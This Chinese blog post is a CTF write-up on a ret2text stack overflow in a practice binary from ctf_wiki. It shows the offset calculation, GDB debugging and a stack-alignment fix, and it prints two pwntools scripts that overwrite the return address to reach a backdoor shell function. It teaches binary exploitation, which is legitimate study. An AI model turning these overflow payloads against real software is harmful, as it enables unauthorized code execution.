【pwn-栈溢出】— ret2text

已于 2023-03-24 18:08:48 修改
阅读量526 收藏 6
点赞数 3
分类专栏: PWN基础 文章标签: 网络安全
于 2023-03-19 10:45:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43988488/article/details/129647724
版权

目录

pwn1

0x1、程序信息

描述内容
程序名称pwn1
程序平台linux
程序来源ctf_wiki
CPU架构amd64
libc版本2.31
利用手法ret2text
系统版本Ubuntu 20.04 LTS
下载地址https://wwnd.lanzoue.com/i3ITH0qeayje

0x2、保护情况

Arch:程序架构信息,i386-32-little——32位小端,amd64—64-little——64位小端

NX保护:堆、栈、BSS段不可执行。

RELRO保护:整个GOT表只读,无法被覆盖。

0x3、检测漏洞函数

1.将程序载入到ida中,找到main函数,下方有一个vuln函数,跟随进去看看

image-20210922110936016


2.漏洞利用点在scanf函数上,未控制缓冲区大小,输入超过16个字符缓冲区将溢出

image-20210922110956896

0x4、确定偏移量

1.在上面的vuln函数中我们可以看到,v1变量与rbp的偏移量是0x10,也就是16字节

2.为了验证IDA帮我们分析出来的这个偏移量是正确的,我们决定用动态调试方法进行确定

image-20210922151721567


3.使用gdb加载程序,在0x4006B2处下一个断点


4.可以输入context查看上下文信息

0x5、寻找可以利用的函数

1.在ida中的函数窗口栏发现有一个getshell函数,它直接就是帮我们运行一个shell

image-20210922111155264


2.看它的反汇编复制它的地址(0x400686),作为我们溢出后返回的位置

image-20210922111240458

0x6、编写利用脚本

#!/usr/bin/python3 
from pwn import *


# 调试日志级别
context.log_level = 'debug'

# 将pwn1程序启动为进程
io = process('./pwn1')

# 构建payload,flat是将列表中的元素给组合起来
# "A" * 0x10 这个是vuln函数缓冲区大小
# p64(0xdeadbeef)表示8字节的整数,用来覆盖rbp,这个值可以任意填
# p64(0x400686)返回地址,返回到get_shell函数开头
payload = flat(['A'* 0x10,p64(0xdeadbeef),p64(0x400686)])

# 使用gdb附加调试
gdb.attach(io)

# 暂停,等待按任意健,程序继续往下执行
pause()

# 接受到Input:字符串后发送payload
io.sendlineafter("Input:",payload)

# 获取交互式shell环境
io.interactive()

0x7、调试观察

1.我们在vuln函数的leave指令处下一个断点,准备动态调试观察栈信息


2.运行exp1.py脚本,在gdb中下断点,并且输入c(continue)指令回车继续


3.在exp1.py叫脚本窗口按回车继续,右边的gdb就会断下来,可以看到当前堆栈的返回地址已经覆盖成了getshell函数的首地址


4.我们输入c指令继续运行,发现程序断在了这里,看下面的堆栈信息,是出现了异常


5.我们去脚本窗口,输入命令试一试,发现输入命令后没有回显,利用并未成功


6.经过上网查找资料发现,movaps它要求RSP必须是16字节对齐


7.我们将当前的RSP除以16发现并没有整除,后面有小数点


8.我们看一看这个函数上方哪里操作了RSP,发现是第一句 push rbp,所以我们跳过这个地址,选择0x40068A这个地址作为返回地址执行

image-20210922115658024

0x8、修改脚本

1.修改后的脚本

#!/usr/bin/python3 
from pwn import *

io = process('./pwn1')

# 将原来的0x400686改成0x40068A
payload = flat(['A'* 0x10,p64(0xdeadbeef),p64(0x40068A)])

io.sendlineafter("Input:",payload)

io.interactive()

2.再次运行exp1.py,完美利用成功执行命令

0x9、总结

9.1、pwn基本流程

  1. 使用checksec检查程序的架构以及保护情况
  2. 寻找程序漏洞函数,比如如gets,scanf等
  3. 计算目标变量的在堆栈中与栈底(32:ebp,64:rbp)的之间偏移
  4. 查看程序导入表,观察表中是否已导入可利用的函数,比如system,execve等
  5. 分析是否有字符串/bin/sh,将它作为system的参数
    • 在此程序中,它直接提供一个后门函数,供我们使用

9.2、GDB调试指令

  1. gdb -q:静默运行程序(不输出gdb启动时提示的版本信息)

  2. b:下断点

  3. c:继续运行

  4. context:查看上下文信息(堆栈、寄存器、反汇编)

  5. quit:退出GDB

9.3、拓展

  • ctf-pwn-tips:里面总结了很多的存在漏洞的函数,以及输入参数的描述,非常实用。

战队官网:https://www.edisec.net/

战队CTF靶场:https://ctf.edisec.net/#/index

战队新社区:https://bbs.edisec.net

小朋友呢
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6018
什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 2607
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
栈溢出实例--笔记一(ret2text
一只青木呀
08-01 1696
栈溢出实例1、什么是栈溢出?2、栈结构3、栈溢出需要解决的问题3.1、解决如何跳转的问题3.2、跳转到哪里去?4、实战 1、什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 2、栈结构 3、栈溢出需要解决的问题 在我们知道什么是栈溢出以及了解了栈的结构之后,我们就可以开始通过栈溢出破坏栈结构。 在破坏栈结构的时候,我们需要注意两个问题: 1、如何跳转? 2、跳转到哪里去? 3.1、解决如何跳转的问题 在上面栈结构的图中
pwn入门之ret2text
最新发布
wangxunyu6的博客
01-07 1168
重点来了:存在gets函数,先让我们了解一下gets函数,它可以无限读入数据,造成栈溢出。观察到s变量距离ebp有0x28的距离,对于这个题来说栈结构为先读入s变量然后下面是ebp然后才是返回地址,那么我们就有思路了,往s变量里面填充垃圾数据直到返回地址把返回地址改为我们需要的flag的位置。第四行:这是我们人为构造的代码数据,根据思路填充垃圾数据0x28个,因为这是32位elf文件所以需要再加上4,p32(flag)即为我们的返回地址。0不用管buf是我们输入数据的地方,0x32是能写入的字节数。
pwn的五道基础题
lllwky的博客
03-27 6508
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
pwn ret2text
小龙在线
09-12 669
首先把ret2text用IDA打开: 64位ELF文件。 进入main函数,F5反编译,双击vulnerable函数,进入: 发现溢出点。 函数窗口列表,查看success,发现shell: 进入IDA普通视图,双击左侧success函数,查看success地址,是400566。 写pwn exp.py: from pwn import * sh = process("./ret2text") payload = b"a"*0x10 + b"b"*0x8 + p64(0x400566) sh.
ctf-wiki rop ret2text
weixin_55885866的博客
05-09 214
观察gets函数写入的数组地址为[esp+1ch],思路为查找esp为多少,因为当前是靠着esp定位地址。查看secure函数中获取到shell的地址(0804863a)2.拿到文件在kali linux中用ida打开。推断距离返回地址偏移的地址为:0x6c+4。于是字符串(esp+1ch)的地址为。推断距离edp的地址为:0x6c。1.下载ret2text文件。获取目标机器shell。
pwn学习day4——ret2text
qq_44657899的博客
06-29 394
覆盖函数返回地址到程序内存在的gadgets获取shell。找到hint函数地址就可以解出题目了,但是打死都不行。gdb断点至scanf函数处,也没看出来哪里出现了问题。32位这里遇到个问题,按理来说覆盖长度为。直接溢出至hint函数处即可。问大佬说是因为需要绕过ecx。
pwn刷题num28---ret2text
tbsqigongzi的博客
04-27 256
BUUCTF-PWN- jarvisoj_level2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 看一下 vulnerable_function();函数 栈溢出,read函数读入0x100字节放在buf处,而buf只有0x88字节大小,可以覆盖返回地
PWN初体验之ret2text
weixin_43137410的博客
08-04 647
"Hello,World!"的浪漫可能只有直男才懂!
pwn07.ret2syscall例题
11-11
ret2syscall例题
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
pwn入门小技巧
qq_36918532的博客
05-24 2598
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
pwn刷题num32----ret2text
tbsqigongzi的博客
04-27 401
BUUCTF-PWN-jarvisoj_level2_x64 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 未开启RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 看一下 vulnerable_function();函数 栈溢出,read函数读入0x200字节放在buf处,而buf只有0x80字节大小,可以覆盖返
pwn-栈溢出】— ret2reg
weixin_43988488的博客
03-19 140
【代码】【pwn-栈溢出】— ret2reg。
pwn+栈溢出解题思路
11-10
栈溢出是一种常见的漏洞,攻击者可以通过利用栈溢出漏洞来执行恶意代码。pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,通常是通过覆盖返回地址或修改函数指针来实现。 3. 获取shell:利用漏洞执行恶意代码后,需要获取shell来进一步控制系统。可以通过调用system函数来执行shell命令。 4. 获取函数地址:在一些情况下,需要获取函数的地址来执行攻击。可以通过泄露函数地址或者使用动态链接库来获取函数地址。 5. 绕过保护机制:现代操作系统通常会有一些保护机制来防止pwn攻击,例如栈随机化、地址空间布局随机化等。攻击者需要找到绕过这些保护机制的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小朋友呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值